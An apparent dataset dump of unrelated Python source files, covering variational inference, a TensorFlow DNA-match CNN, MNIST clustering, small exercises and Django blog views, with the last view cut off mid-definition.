text stringlengths 38 1.54M |
|---|
import matplotlib.pyplot as plt
import numpy as np
import torch
from brancher.variables import ProbabilisticModel
from brancher.standard_variables import NormalVariable, DeterministicVariable, LogNormalVariable
import brancher.functions as BF
from brancher.visualizations import plot_density
from brancher.transformations import PlanarFlow
from brancher import inference
from brancher.visualizations import plot_posterior
# Model
M = 8
y = NormalVariable(torch.zeros((M,)), 1.*torch.ones((M,)), "y")
y0 = DeterministicVariable(y[1], "y0")
d = NormalVariable(y, torch.ones((M,)), "d")
model = ProbabilisticModel([d, y, y0])
# get samples
d.observe(d.get_sample(55, input_values={y: 1.*torch.ones((M,))}))
# Variational distribution
u1 = DeterministicVariable(torch.normal(0., 1., (M, 1)), "u1", learnable=True)
w1 = DeterministicVariable(torch.normal(0., 1., (M, 1)), "w1", learnable=True)
b1 = DeterministicVariable(torch.normal(0., 1., (1, 1)), "b1", learnable=True)
u2 = DeterministicVariable(torch.normal(0., 1., (M, 1)), "u2", learnable=True)
w2 = DeterministicVariable(torch.normal(0., 1., (M, 1)), "w2", learnable=True)
b2 = DeterministicVariable(torch.normal(0., 1., (1, 1)), "b2", learnable=True)
z = NormalVariable(torch.zeros((M, 1)), torch.ones((M, 1)), "z", learnable=True)
Qy = PlanarFlow(w2, u2, b2)(PlanarFlow(w1, u1, b1)(z))
Qy.name = "y"
Qy0 = DeterministicVariable(Qy[1], "y0")
#Qy._get_sample(4)[Qy].shape
variational_model = ProbabilisticModel([Qy, Qy0])
model.set_posterior_model(variational_model)
# Inference #
inference.perform_inference(model,
number_iterations=400,
number_samples=100,
optimizer="Adam",
lr=0.5)
loss_list1 = model.diagnostics["loss curve"]
#Plot posterior
plot_posterior(model, variables=["y0"])
plt.show()
# Variational distribution
Qy = NormalVariable(torch.zeros((M,)), 0.5*torch.ones((M,)), "y", learnable=True)
Qy0 = DeterministicVariable(Qy[1], "y0")
variational_model = ProbabilisticModel([Qy, Qy0])
model.set_posterior_model(variational_model)
# Inference #
inference.perform_inference(model,
number_iterations=400,
number_samples=100,
optimizer="Adam",
lr=0.01)
loss_list2 = model.diagnostics["loss curve"]
#Plot posterior
plot_posterior(model, variables=["y0"])
plt.show()
plt.plot(loss_list1)
plt.plot(loss_list2)
plt.show()
|
__author__ = '29146'
import sys
def createstack():
stack = []
return stack
def push(item,stack):
stack.append(item)
print stack
def pop(stack):
stack.pop()
print stack
def peek(stack):
print stack[len(stack)-1]
if __name__ == '__main__':
stack = createstack()
push(str(20),stack)
push(str(40),stack)
push(str(30),stack)
pop(stack)
peek(stack) |
import random
import time
import os
class PostIt(object):
def __init__(self, content):
self.content = content
class NoteBook(object):
def __init__(self, book_title):
self.book_title = book_title
self.counter = 0
self.note_dict = {}
def add_post_it(self, page, content):
self.counter += 1
self.note_dict[page] = content
self.show_status()
def get_total_pages(self):
return self.counter
def show_used_pages(self):
keys = list(self.note_dict.keys())
keys.sort()
for key in keys:
print("{:2d}. {}".format(key, self.note_dict[key]), flush=True)
def show_status(self):
print("~~~~ %s ~~~~" % self.book_title)
print("포스트잇 갯수 = ", self.get_total_pages(), flush=True)
print('==' * 10)
self.show_used_pages()
print('\n\n')
time.sleep(0.5)
os.system('cls')
def add_list_to_postit(obj, titles,):
for title in titles:
while True:
page = random.randint(1, len(titles))
if page not in obj.note_dict:
obj.add_post_it(page=page, content=title)
break
titles = [
'asd',
'asd',
'asd',
'asd',
'sdf',
'asd',
'asd',
'asd',
'asd',
'sdf',
'asd',
'asd',
'asd',
]
nb = NoteBook('가사모음집')
add_list_to_postit(nb, titles)
|
# _ooOoo_
# o8888888o
# 88" . "88
# (| -_- |)
# O\ = /O
# ____/`---'\____
# . ' \\| |// `.
# / \\||| : |||// \
# / _||||| -:- |||||- \
# | | \\\ - /// | |
# | \_| ''\---/'' | |
# \ .-\__ `-` ___/-. /
# ___`. .' /--.--\ `. . __
# ."" '< `.___\_<|>_/___.' >'"".
# | | : `- \`.;`\ _ /`;.`/ - ` : | |
# \ \ `-. \_ __\ /__ _/ .-` / /
# ======`-.____`-.___\_____/___.-`____.-'======
# `=---='
#
# .............................................
# 佛祖保佑 永无BUG
# 佛曰:
# 写字楼里写字间,写字间里程序员;
# 程序人员写程序,又拿程序换酒钱。
# 酒醒只在网上坐,酒醉还来网下眠;
# 酒醉酒醒日复日,网上网下年复年。
# 但愿老死电脑间,不愿鞠躬老板前;
# 奔驰宝马贵者趣,公交自行程序员。
# 别人笑我忒疯癫,我笑自己命太贱;
# 不见满街漂亮妹,哪个归得程序员?
from multiprocessing import Process
# def func1():
# for i in range(1,10000):
# print("func1",i)
#
def func2(name):
for i in range(1,10000):
print(name,i)
if __name__ == '__main__':
p1 = Process(target=func2, args=(("lisi",)))
p2 = Process(target=func2, args=("zhangsan",))
p1.start()
p2.start()
# class My_Process(Process):
# def __init__(self, name):
# super(My_Process,self).__init__()
# self.name = name
#
# def run(self):
# for i in range(1,10000):
# print(self.name, i)
#
# if __name__ == '__main__':
# p1 = My_Process("func1")
# p2 = My_Process("func2")
# p1.start()
# p2.start() |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A deep MNIST classifier using convolutional layers.
See extensive documentation at
https://www.tensorflow.org/get_started/mnist/pros
"""
# Disable linter warnings to maintain consistency with tutorial.
# pylint: disable=invalid-name
# pylint: disable=g-bad-import-order
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import sys
# from tensorflow.examples.tutorials.mnist import input_data
import gzip
import os
import tempfile
import numpy
from six.moves import urllib
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.contrib.learn.python.learn.datasets import base
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import random_seed
import tensorflow as tf
class DataSet(object):
def __init__(self,
images,
labels,
fake_data=False,
one_hot=False,
dtype=dtypes.float32,
reshape=True,
seed=None):
"""Construct a DataSet.
one_hot arg is used only if fake_data is true. `dtype` can be either
`uint8` to leave the input as `[0, 255]`, or `float32` to rescale into
`[0, 1]`. Seed arg provides for convenient deterministic testing.
"""
seed1, seed2 = random_seed.get_seed(seed)
# If op level seed is not set, use whatever graph level seed is returned
numpy.random.seed(seed1 if seed is None else seed2)
dtype = dtypes.as_dtype(dtype).base_dtype
if dtype not in (dtypes.uint8, dtypes.float32):
raise TypeError('Invalid image dtype %r, expected uint8 or float32' %
dtype)
if fake_data:
self._num_examples = 10000
self.one_hot = one_hot
else:
assert images.shape[0] == labels.shape[0], (
'images.shape: %s labels.shape: %s' % (images.shape, labels.shape))
self._num_examples = images.shape[0]
# Convert shape from [num examples, rows, columns, depth]
# to [num examples, rows*columns] (assuming depth == 1)
if reshape:
assert images.shape[3] == 1
images = images.reshape(images.shape[0],
images.shape[1] * images.shape[2])
if dtype == dtypes.float32:
# Convert from [0, 255] -> [0.0, 1.0].
images = images.astype(numpy.float32)
images = numpy.multiply(images, 1.0 / 255.0)
self._images = images
self._labels = labels
self._epochs_completed = 0
self._index_in_epoch = 0
@property
def images(self):
return self._images
@property
def labels(self):
return self._labels
@property
def num_examples(self):
return self._num_examples
@property
def epochs_completed(self):
return self._epochs_completed
def next_batch(self, batch_size, fake_data=False, shuffle=False):
"""Return the next `batch_size` examples from this data set."""
if fake_data:
fake_image = [1] * 784
if self.one_hot:
fake_label = [1] + [0] * 9
else:
fake_label = 0
return [fake_image for _ in xrange(batch_size)], [
fake_label for _ in xrange(batch_size)
]
start = self._index_in_epoch
# Shuffle for the first epoch
if self._epochs_completed == 0 and start == 0 and shuffle:
perm0 = numpy.arange(self._num_examples)
numpy.random.shuffle(perm0)
self._images = self.images[perm0]
self._labels = self.labels[perm0]
# Go to the next epoch
if start + batch_size > self._num_examples:
# Finished epoch
self._epochs_completed += 1
# Get the rest examples in this epoch
rest_num_examples = self._num_examples - start
images_rest_part = self._images[start:self._num_examples]
labels_rest_part = self._labels[start:self._num_examples]
# Shuffle the data
if shuffle:
perm = numpy.arange(self._num_examples)
numpy.random.shuffle(perm)
self._images = self.images[perm]
self._labels = self.labels[perm]
# Start next epoch
start = 0
self._index_in_epoch = batch_size - rest_num_examples
end = self._index_in_epoch
images_new_part = self._images[start:end]
labels_new_part = self._labels[start:end]
return numpy.concatenate((images_rest_part, images_new_part), axis=0), numpy.concatenate(
(labels_rest_part, labels_new_part), axis=0)
else:
self._index_in_epoch += batch_size
end = self._index_in_epoch
return self._images[start:end], self._labels[start:end]
def _read32(bytestream):
dt = numpy.dtype(numpy.uint32).newbyteorder('>')
return numpy.frombuffer(bytestream.read(4), dtype=dt)[0]
def extract_images(f):
"""Extract the images into a 4D uint8 numpy array [index, y, x, depth].
Args:
f: A file object that can be passed into a gzip reader.
Returns:
data: A 4D uint8 numpy array [index, y, x, depth].
Raises:
ValueError: If the bytestream does not start with 2051.
"""
print('Extracting', f.name)
# with gzip.GzipFile(fileobj=f) as bytestream:
# with gzip.GzipFile(fileobj=f) as bytestream:
bytestream = f
magic = _read32(bytestream)
print('Extracted %d' % magic)
if magic != 2051:
raise ValueError('Invalid magic number %d in MNIST image file: %s' %
(magic, f.name))
num_images = _read32(bytestream)
rows = _read32(bytestream)
cols = _read32(bytestream)
print(num_images, rows, cols)
buf = bytestream.read(rows * cols * num_images)
data = numpy.frombuffer(buf, dtype=numpy.uint8)
print(num_images, rows, cols)
data = data.reshape(num_images, rows, cols, 1) * 255.0
return data
def dense_to_one_hot(labels_dense, num_classes):
"""Convert class labels from scalars to one-hot vectors."""
num_labels = labels_dense.shape[0]
index_offset = numpy.arange(num_labels) * num_classes
labels_one_hot = numpy.zeros((num_labels, num_classes))
labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1
return labels_one_hot
def extract_labels(f, one_hot=False, num_classes=2):
"""Extract the labels into a 1D uint8 numpy array [index].
Args:
f: A file object that can be passed into a gzip reader.
one_hot: Does one hot encoding for the result.
num_classes: Number of classes for the one hot encoding.
Returns:
labels: a 1D uint8 numpy array.
Raises:
ValueError: If the bystream doesn't start with 2049.
"""
print('Extracting', f.name)
# with gzip.GzipFile(fileobj=f) as bytestream:
bytestream = f
magic = _read32(bytestream)
print('Extracted %d' % magic)
if magic != 2049:
raise ValueError('Invalid magic number %d in MNIST label file: %s' %
(magic, f.name))
num_items = _read32(bytestream)
buf = bytestream.read(num_items)
labels = numpy.frombuffer(buf, dtype=numpy.uint8) * 2.0 - 1.0
if one_hot:
return dense_to_one_hot(labels, num_classes)
labels = labels.reshape(num_items, 1)
return labels
def read_data_sets(train_dir,
fake_data=False,
one_hot=False,
dtype=dtypes.float32,
reshape=True,
validation_size=5000,
seed=None):
if fake_data:
def fake():
return DataSet(
[], [], fake_data=True, one_hot=one_hot, dtype=dtype, seed=seed)
train = fake()
validation = fake()
test = fake()
return base.Datasets(train=train, validation=validation, test=test)
# TRAIN_IMAGES = 'train.set.no.init.shift.data.ubyte1'
# TRAIN_LABELS = 'train.set.no.init.shift.label.ubyte'
# TEST_IMAGES = 'test.set.no.init.shift.data.ubyte1'
# TEST_LABELS = 'test.set.no.init.shift.label.ubyte'
# TRAIN_IMAGES = 'train.set.200K.data.ubyte1'
# TRAIN_LABELS = 'train.set.200K.label.ubyte'
TRAIN_IMAGES = 'train.set.same.500K.data.ubyte'
TRAIN_LABELS = 'train.set.same.500K.label.ubyte'
# TRAIN_IMAGES = 'train.set.data.ubyte1'
# TRAIN_LABELS = 'train.set.label.ubyte'
TEST_IMAGES = 'test.set.same.data.ubyte'
TEST_LABELS = 'test.set.same.label.ubyte'
local_file = TRAIN_IMAGES
with open(local_file, 'rb') as f:
train_images = extract_images(f)
local_file = TRAIN_LABELS
with open(local_file, 'rb') as f:
train_labels = extract_labels(f, one_hot=one_hot)
local_file = TEST_IMAGES
with open(local_file, 'rb') as f:
test_images = extract_images(f)
local_file = TEST_LABELS
with open(local_file, 'rb') as f:
test_labels = extract_labels(f, one_hot=one_hot)
if not 0 <= validation_size <= len(train_images):
raise ValueError(
'Validation size should be between 0 and {}. Received: {}.'
.format(len(train_images), validation_size))
validation_images = train_images[:validation_size]
validation_labels = train_labels[:validation_size]
train_images = train_images[validation_size:]
train_labels = train_labels[validation_size:]
options = dict(dtype=dtype, reshape=reshape, seed=seed)
train = DataSet(train_images, train_labels, **options)
validation = DataSet(validation_images, validation_labels, **options)
test = DataSet(test_images, test_labels, **options)
return base.Datasets(train=train, validation=validation, test=test)
def read_data_sets2(train_dir,
fake_data=False,
one_hot=False,
dtype=dtypes.float32,
reshape=True,
validation_size=5000,
seed=None):
if fake_data:
def fake():
return DataSet(
[], [], fake_data=True, one_hot=one_hot, dtype=dtype, seed=seed)
train = fake()
validation = fake()
test = fake()
return base.Datasets(train=train, validation=validation, test=test)
# TRAIN_IMAGES = 'train.set.no.init.shift.data.ubyte2'
# TRAIN_LABELS = 'train.set.no.init.shift.label.ubyte'
# TEST_IMAGES = 'test.set.no.init.shift.data.ubyte2'
# TEST_LABELS = 'test.set.no.init.shift.label.ubyte'
# TRAIN_IMAGES = 'train.set.200K.data.ubyte2'
# TRAIN_LABELS = 'train.set.200K.label.ubyte'
TRAIN_IMAGES = 'train.set.500K.data.ubyte2'
TRAIN_LABELS = 'train.set.500K.label.ubyte'
# TRAIN_IMAGES = 'train.set.data.ubyte2'
# TRAIN_LABELS = 'train.set.label.ubyte'
TEST_IMAGES = 'test.set.data.ubyte2'
TEST_LABELS = 'test.set.label.ubyte'
local_file = TRAIN_IMAGES
with open(local_file, 'rb') as f:
train_images = extract_images(f)
local_file = TRAIN_LABELS
with open(local_file, 'rb') as f:
train_labels = extract_labels(f, one_hot=one_hot)
local_file = TEST_IMAGES
with open(local_file, 'rb') as f:
test_images = extract_images(f)
local_file = TEST_LABELS
with open(local_file, 'rb') as f:
test_labels = extract_labels(f, one_hot=one_hot)
if not 0 <= validation_size <= len(train_images):
raise ValueError(
'Validation size should be between 0 and {}. Received: {}.'
.format(len(train_images), validation_size))
validation_images = train_images[:validation_size]
validation_labels = train_labels[:validation_size]
train_images = train_images[validation_size:]
train_labels = train_labels[validation_size:]
options = dict(dtype=dtype, reshape=reshape, seed=seed)
train = DataSet(train_images, train_labels, **options)
validation = DataSet(validation_images, validation_labels, **options)
test = DataSet(test_images, test_labels, **options)
return base.Datasets(train=train, validation=validation, test=test)
FLAGS = None
def deepnn(x1):
"""deepnn builds the graph for a deep net for classifying digits.
Args:
x: an input tensor with the dimensions (N_examples, 800), where 800 is the
number of pixels in a standard MNIST image.
Returns:
A tuple (y, keep_prob). y is a tensor of shape (N_examples, 2), with values
equal to the logits of classifying the digit into one of 2 classes (the
0:mimsmatch 1:match). keep_prob is a scalar placeholder for the probability of
dropout.
"""
# Reshape to use within a convolutional neural net.
# Last dimension is for "features" - there is only one here, since images are
# grayscale -- it would be 3 for an RGB image, 4 for RGBA, etc.
x1_image = tf.reshape(x1, [-1, 100, 8, 1])
tanh_const = tf.constant(1.0)
# First convolutional layer - maps one grayscale image to 32 feature maps.
# W_conv1 = weight_variable([3, 4, 1, 64])
# W_conv1 = tf.reshape(W1_det, [3, 8, 1, 64])
W_conv1 = weight_variable([3, 8, 1, 64])
h1_conv1 = tf.nn.relu(conv2d_1(x1_image, W_conv1))
# h1_conv1 = tf.nn.relu(conv2d_1(x1_image, W_conv1) - 2)
# Pooling layer - downsamples by 2X.
h1_pool1 = max_pool_5x1(h1_conv1)
# Second convolutional layer -- maps 32 feature maps to 64.
W_conv2 = weight_variable([5, 1, 64, 64])
h1_conv2 = tf.nn.relu(tf.nn.tanh(tf.multiply(tanh_const, conv2d(h1_pool1, W_conv2))))
# h1_conv2 = tf.nn.relu(tf.nn.tanh(tf.multiply(tanh_const,conv2d(h1_pool1, W_conv2) + b_conv2)))
# Second pooling layer.
h1_pool2 = max_pool_2x1(h1_conv2)
# h1_pool2 = (h1_conv2)
# Third convolutional layer -- maps 32 feature maps to 64.
W_conv3 = weight_variable([4, 1, 64, 40])
# h1_conv3 = tf.nn.relu(tf.nn.tanh(tf.multiply(tanh_const,conv2d(h1_pool2, W_conv3) + b_conv3)))
h1_conv3 = tf.nn.relu(tf.nn.tanh(tf.multiply(tanh_const, conv2d(h1_pool2, W_conv3))))
# Third pooling layer.
# h1_pool3 = max_pool_2x1(h1_conv3)
# h1_pool3 = h1_conv3
h1_pool3 = max_pool_2x1(h1_conv3)
# Fully connected layer 1 -- after 2 round of downsampling, our 28x28 image
# is down to 7x7x64 feature maps -- maps this to 1024 features.
W_fc1 = weight_variable([200, 50])
h1_pool2_flat = tf.reshape(h1_pool3, [-1, 200])
tanh_beta = tf.constant(1.0)
tanh_beta2 = tf.constant(1.0)
h1_fc1 = tf.nn.tanh(tf.multiply(tanh_const, tf.matmul(h1_pool2_flat, W_fc1)))
# h1_fc1 = tf.nn.tanh(tf.multiply(tanh_const,tf.matmul(h1_pool2_flat, W_fc1)) + b2_fc1)
# h2_fc1 = tf.nn.tanh(tf.multiply(tanh_const,tf.matmul(h2_pool2_flat, W_fc1)) + b2_fc1)
W_final = weight_variable([50, 1])
b_final = bias_variable([1])
inner_product = tf.matmul(h1_fc1, W_final) + b_final
return inner_product, W_conv1, W_conv2, W_fc1, h1_conv1
# return inner_product
def conv2d(x, W):
"""conv2d returns a 2d convolution layer with full stride."""
return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
def conv2d_1(x, W):
"""conv2d returns a 2d convolution layer with full stride."""
return tf.nn.conv2d(x, W, strides=[1, 1, 8, 1], padding='SAME')
def max_pool_2x1(x):
"""max_pool_2x1 downsamples a feature map by 2X."""
return tf.nn.max_pool(x, ksize=[1, 2, 1, 1],
strides=[1, 2, 1, 1], padding='SAME')
def max_pool_4x1(x):
"""max_pool_2x1 downsamples a feature map by 2X."""
return tf.nn.max_pool(x, ksize=[1, 4, 1, 1],
strides=[1, 4, 1, 1], padding='SAME')
def max_pool_5x1(x):
"""max_pool_2x1 downsamples a feature map by 2X."""
return tf.nn.max_pool(x, ksize=[1, 5, 1, 1],
strides=[1, 5, 1, 1], padding='SAME')
def max_pool_10x1(x):
"""max_pool_2x1 downsamples a feature map by 2X."""
return tf.nn.max_pool(x, ksize=[1, 10, 1, 1],
strides=[1, 10, 1, 1], padding='SAME')
def max_pool_2x2(x):
"""max_pool_2x2 downsamples a feature map by 2X."""
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
def weight_variable(shape):
"""weight_variable generates a weight variable of a given shape."""
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial)
def bias_variable(shape):
"""bias_variable generates a bias variable of a given shape."""
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial)
def main(_):
# Import data
mnist1 = read_data_sets(FLAGS.data_dir, one_hot=False)
# Create the model
x1 = tf.placeholder(tf.float32, [None, 800])
# Create deterministic weights of first layer
W1_vals = tf.placeholder(tf.float32, [768])
W1s = []
for m in range(3):
for n in range(4):
for k in range(4):
for i in range(4):
for j in range(4):
if m == 0:
if n == i:
W1s.append(1.0)
else:
W1s.append(.0)
elif m == 1:
if n == j:
W1s.append(1.0)
else:
W1s.append(.0)
else:
if n == k:
W1s.append(1.0)
else:
W1s.append(.0)
# Define loss and optimizer
y_ = tf.placeholder(tf.float32, [None, 1])
# binary training step size
train_ss = tf.placeholder(tf.float32)
tri_level = tf.placeholder(tf.float32)
# Build the graph for the deep net
y_conv, W1_temp, W2_temp, W3_temp, h1_temp = deepnn(x1)
# training
cross_entropy = tf.reduce_mean(tf.square(y_ - y_conv), keep_dims=True)
train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)
# test
final_pred = tf.cast(tf.sign(y_conv), tf.float32)
correct_prediction = tf.equal(final_pred, y_)
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
# output monitor FP + FN
out_diff = final_pred - y_
false_pos_sum = tf.reduce_sum(tf.cast(tf.equal(out_diff, 2), tf.float32))
false_neg_sum = tf.reduce_sum(tf.cast(tf.equal(out_diff, -2), tf.float32))
false_pos = tf.equal(out_diff, 2)
false_neg = tf.equal(out_diff, -2)
# saver for the variables the variables
saver = tf.train.Saver()
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
# loading the variables
# saver.restore(sess, "./vars/all_weights")
# print("Model restored.")
# training
num_iter = 20000
for i in range(num_iter):
batch1 = mnist1.train.next_batch(50)
if i % 100 == 0:
train_accuracy = accuracy.eval(feed_dict={x1: batch1[0], y_: batch1[1]})
print('step %d, training accuracy %g' % (i, train_accuracy))
train_step.run(feed_dict={x1: batch1[0], y_: batch1[1]})
# saving the variables
# save_path = saver.save(sess, "./vars/all_weights")
# print("Model saved in file: %s" % save_path)
# print stuff here
# print Conv1 Weights
batch_temp = mnist1.train.next_batch(1)
f = open("h_conv1", "w")
print("H_CONV1")
Wtemp = sess.run(h1_temp, feed_dict={W1_vals: W1s, x1: batch_temp[0]})
for k in range(64):
for i in range(1):
for j in range(100):
f.write(str(Wtemp[i][j][0][k]))
f.write('\n')
f.close()
# print Conv1 Weights
f = open("w_conv1", "w")
print("W_CONV1")
Wtemp = sess.run(W1_temp, feed_dict={W1_vals: W1s})
for k in range(64):
for i in range(3):
for j in range(4):
f.write(str(Wtemp[i][j][0][k]))
f.write('\n')
f.close()
# print Conv1 binary Weights
# f = open("w_conv1_bin", "w")
# print("W_CONV1_bin")
# Wtemp = sess.run(W1_bin, feed_dict={W1_vals:W1s})
# for i in range(3):
# for j in range(4):
# for k in range(64):
# f.write ( str(Wtemp[i][j][0][k]) )
# f.write ( '\n' )
# f.close()
# print Conv2 Weights
f = open("w_conv2", "w")
print("W_CONV2")
Wtemp = sess.run(W2_temp)
for i in range(5):
for j in range(64):
for k in range(20):
f.write(str(Wtemp[i][0][j][k]))
f.write('\n')
f.close()
# print Conv2 triary Weights
# f = open("w_conv2_tri", "w")
# print("W_CONV2_tri")
# Wtemp = sess.run(W2_tri, feed_dict={tri_level: tri_train_level})
# for i in range(5):
# for j in range(64):
# for k in range(20):
# f.write ( str(Wtemp[i][0][j][k]) )
# f.write ( '\n' )
# f.close()
# print Fully-Connected Weights
f = open("w_fc", "w")
print("W_FC")
Wtemp = sess.run(W3_temp)
for i in range(100):
for j in range(30):
f.write(str(Wtemp[i][j]))
f.write('\n')
f.close()
# print Fully-Connected triary Weights
# f = open("w_fc_tri", "w")
# print("W_FC_tri")
# Wtemp = sess.run(W3_tri, feed_dict={tri_level: tri_train_level})
# for i in range(500):
# for j in range(30):
# f.write ( str(Wtemp[i][j]) )
# f.write ( '\n' )
# f.close()
# test
batch_size = 50
batch_num = int(mnist1.test.num_examples / batch_size)
test_accuracy = 0
total_FP = 0
total_FN = 0
for i in range(batch_num):
batch1 = mnist1.test.next_batch(batch_size)
test_accuracy += accuracy.eval(feed_dict={x1: batch1[0], y_: batch1[1]})
total_FP += false_pos_sum.eval(feed_dict={x1: batch1[0], y_: batch1[1]})
total_FN += false_neg_sum.eval(feed_dict={x1: batch1[0], y_: batch1[1]})
FPs = false_pos.eval(feed_dict={x1: batch1[0], y_: batch1[1]})
FNs = false_neg.eval(feed_dict={x1: batch1[0], y_: batch1[1]})
# X1s = batch1[0]
# X2s = batch2[0]
for j in range(batch_size):
# if FPs[j] == True:
if False:
fp_ind = i * batch_size + j
print("FP 0 @ %d" % fp_ind)
X1_tmp = X1s[j]
for k in range(100):
if X1_tmp[k * 4] == 1:
print('A', end='')
elif X1_tmp[k * 4 + 1] == 1:
print('C', end='')
elif X1_tmp[k * 4 + 2] == 1:
print('G', end='')
else:
print('T', end='')
print(' ', end='\n')
X2_tmp = X2s[j]
for k in range(100):
if X2_tmp[k * 4] == 1:
print('A', end='')
elif X2_tmp[k * 4 + 1] == 1:
print('C', end='')
elif X2_tmp[k * 4 + 2] == 1:
print('G', end='')
else:
print('T', end='')
print(' ', end='\n')
for j in range(batch_size):
# if FNs[j] == True:
if False:
fp_ind = i * batch_size + j
print("FN 1 @ %d" % fp_ind)
X1_tmp = X1s[j]
for k in range(100):
if X1_tmp[k * 4] == 1:
print('A', end='')
elif X1_tmp[k * 4 + 1] == 1:
print('C', end='')
elif X1_tmp[k * 4 + 2] == 1:
print('G', end='')
else:
print('T', end='')
print(' ', end='\n')
X2_tmp = X2s[j]
for k in range(100):
if X2_tmp[k * 4] == 1:
print('A', end='')
elif X2_tmp[k * 4 + 1] == 1:
print('C', end='')
elif X2_tmp[k * 4 + 2] == 1:
print('G', end='')
else:
print('T', end='')
print(' ', end='\n')
test_accuracy /= batch_num
print("test accuracy %g" % test_accuracy)
print("#FPs: %g" % total_FP)
print("#FNs: %g" % total_FN)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', type=str,
default='/tmp/tensorflow/mnist/input_data',
help='Directory for storing input data')
FLAGS, unparsed = parser.parse_known_args()
tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
|
'''
Problem
A partial permutation is an ordering of only k objects taken from a collection containing n objects (i.e., k<=n).
For example, one partial permutation of three of the first eight positive integers is given by (5,7,2).
The statistic P(n,k) counts the total number of partial permutations of k objects that can be formed from a collection of n objects.
Note that P(n,n) is just the number of permutations of n objects, which we found to be equal to n!=n(n-1)(n-2)...(3)(2) in "Enumerating Gene Orders".
Given: Positive integers n and k such that 100>=n>0 and 10>=k>0.
Return: The total number of partial permutations P(n,k), modulo 1,000,000.
Sample Dataset
21 7
Sample Output
51200
'''
import math
def binomial_coefficient(n, k):
res = 1
for i in xrange(1, k+1):
res = res * (n-i+1) / i
return res
f = open('in.txt', 'r')
n, k = [int(x) for x in f.readline().strip().split(' ')]
print binomial_coefficient(n,k) * math.factorial(k) % 1000000
|
import numpy as np
from mnist import MNIST
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans
from sklearn.neighbors import NearestNeighbors
from sklearn.preprocessing import normalize
import imageio
# Module display_nerwork help us hiển thị nhiều bức ảnh các chữ số cùng một lúc
from display_network import *
mndata = MNIST('./MNIST/')
mndata.load_testing()
X = mndata.test_images
print(X[0])
X0 = np.asarray(X)[:1000, :]/256.0
X = X0
print(X)
K = 10
kmeans = KMeans(n_clusters=K).fit(X)
pred_label = kmeans.predict(X)
print(type(kmeans.cluster_centers_.T))
print(kmeans.cluster_centers_.T.shape)
A = display_network(kmeans.cluster_centers_.T, K, 1)
f1 = plt.imshow(A, interpolation='nearest', cmap="jet")
f1.axes.get_xaxis().set_visible(False)
f1.axes.get_yaxis().set_visible(False)
plt.show()
# a colormap and a normalization instance
cmap = plt.cm.jet
norm = plt.Normalize(vmin=A.min(), vmax=A.max())
# map the normalized data to colors
# image is now RGBA (512x512x4)
image = cmap(norm(A))
imageio.imwrite('mnist_clustering.png', image)
print(type(pred_label))
print(pred_label.shape)
print(type(X0))
N0 = 20
X1 = np.zeros((N0*K, 784))
X2 = np.zeros((N0*K, 784))
for k in range(K):
Xk = X0[pred_label == k, :]
center_k = [kmeans.cluster_centers_[k]]
neigh = NearestNeighbors(N0).fit(Xk)
dist, nearest_id = neigh.kneighbors(center_k, N0)
X1[N0*k: N0*k + N0, :] = Xk[nearest_id, :]
X2[N0*k: N0*k + N0, :] = Xk[:N0, :]
plt.axis('off')
A = display_network(X2.T, K, N0)
f2 = plt.imshow(A, interpolation='nearest')
plt.gray()
plt.show()
|
from django.http.response import HttpResponse
from django.shortcuts import get_object_or_404, redirect, render
from django.urls import reverse
from django.db.models import Q
from .models import Category, Post
from comments.models import *
from .forms import *
from comments.forms import *
from FinalBlog.settings import MEDIA_ROOT
import os
from dashboard.forms import PostsForm
# from django.contrib.auth.decorators import login_required
# Create your views here.
def home(request):
categories = Category.objects.all()
post = Post.objects.get(slug="laravellaravel")
for cat in post.categories.all():
print(cat)
if 'category' in request.GET and categories.filter(name = request.GET['category']):
posts = Post.objects.filter(categories__name = request.GET['category'])
else:
posts = Post.objects.all().order_by('-publish')
context = {
"posts": posts,
"categories": categories
}
return render(request, 'posts/home.html', context)
def detail(request, slug):
post = get_object_or_404(Post, slug=slug)
comments = post.comments.filter(parent__isnull=True)
is_liked = post.likes.filter(username=request.user.username).exists()
is_disliked = post.dislikes.filter(username=request.user.username).exists()
comment_form = commentForm()
context = {
"post": post,
"comments": comments,
"is_liked": is_liked,
"is_disliked": is_disliked,
"comment_form": comment_form
}
return render(request, 'posts/detail.html', context)
def search(request):
field = request.GET['search']
posts = Post.objects.filter(Q(title__icontains=field) | Q(
content__icontains=field)) # change it to tags later
categories = Category.objects.all()
context = {
"posts": posts,
"categories": categories
}
return render(request, 'posts/home.html', context)
def like(request, slug, is_liked):
post = get_object_or_404(Post, slug=slug)
if is_liked == "True":
post.likes.remove(request.user)
post.dislikes.add(request.user)
else:
post.likes.add(request.user)
post.dislikes.remove(request.user)
if post.dislikes.count() >= 10:
post.delete()
return redirect('posts:home')
return redirect(reverse('posts:detail', kwargs={"slug": slug}))
def subscribe(request, id):
pass
# @login_required
def create(request):
form = PostsForm(request.POST or None, request.FILES or None)
if request.method == 'POST' and form.is_valid():
post = Post(title=form.cleaned_data['title'], content=form.cleaned_data['content'] , image=form.cleaned_data['image'])
post.user = request.user
post.save()
for id in form.cleaned_data['categories']:
category = get_object_or_404(Category, id=int(id))
post.categories.add(category)
if request.user.is_staff:
return redirect('dashboard:home')
return redirect('posts:home')
context = {
"form": form
}
return render(request, "posts/create.html", context)
def edit(request, slug):
